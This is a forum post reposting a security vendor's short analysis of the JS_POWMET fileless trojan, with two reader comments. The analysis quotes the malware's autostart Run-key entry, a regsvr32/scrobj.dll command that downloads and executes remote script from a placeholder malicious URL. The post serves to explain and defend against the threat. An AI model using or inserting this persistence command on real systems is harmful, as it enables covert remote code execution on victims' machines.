A Look at JS_POWMET, a Completely Fileless Malware

[LASER_oneXM]

As cybercriminals start to focus on pulling off attacks without leaving a trace, fileless malware, such as the recent SOREBRECT ransomware, will become a more common attack method. However, many of these malware are fileless only while entering a user’s system, as they eventually reveal themselves when they execute their payload. Attacks that use completely fileless malware are a rare occurrence, so we thought it important to discuss a new trojan known as JS_POWMET (Detected by Trend Micro as JS_POWMET.DE), which arrives via an autostart registry procedure. By utilizing a completely fileless infection chain, the malware will be more difficult to analyze using a sandbox, making it more difficult for anti-malware engineers to examine.

Although the exact method of arrival is still not certain, it is likely that the trojan is downloaded by users that visit malicious sites, or as a file that is dropped by other malware. What is clear about this malware is that the following registry has already been changed by the time it is downloaded into the system.

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run

COM+ = “regsvr32 /s /n /u /i:{Malicious URL, downloads JS_POWMET} scrobj.dll”

JS_POWMET is downloaded via an autostart registry entry (shown above).

Conclusion

While JS_POWMET and the rest of the files it downloads are relatively light in terms of impact, this malware demonstrates the lengths cybercriminals will go to avoid detection and analysis. It also shows that even relatively uncommon infection methods involving fileless malware continually evolve. Organizations and users should always look beyond the obvious malware files and always be on the lookout for “stealthy” malware that manages to slip into the system virtually unnoticed.

One of the more effective methods for mitigating the effects of fileless malware would be to limit access to critical infrastructure via container-based systems that separate endpoints from the most important parts of the network. For this specific malware, IT professionals can also look into disabling Powershell itself to help mitigate the effects of JS_POWMET and its various payloads.

 

[Winter Soldier]

Great sharing
It would be interesting to know if it gets the addresses from the various API such as LoadLibrary, GetProcAddress, VirtualAlloc, etc, then reading the registry key in a buffer of allocated memory, and after a series of operations by rebuilding an executable file in memory through the call to its EntryPoint.

 

[shmu26]

I don't know why is it called "completely fileless," if it consists of various malware files: "While JS_POWMET and the rest of the files it downloads are relatively light in terms of impact..."
I think the term "fileless malware" has just become an attention grabber, and authors are using it shamelessly in article titles.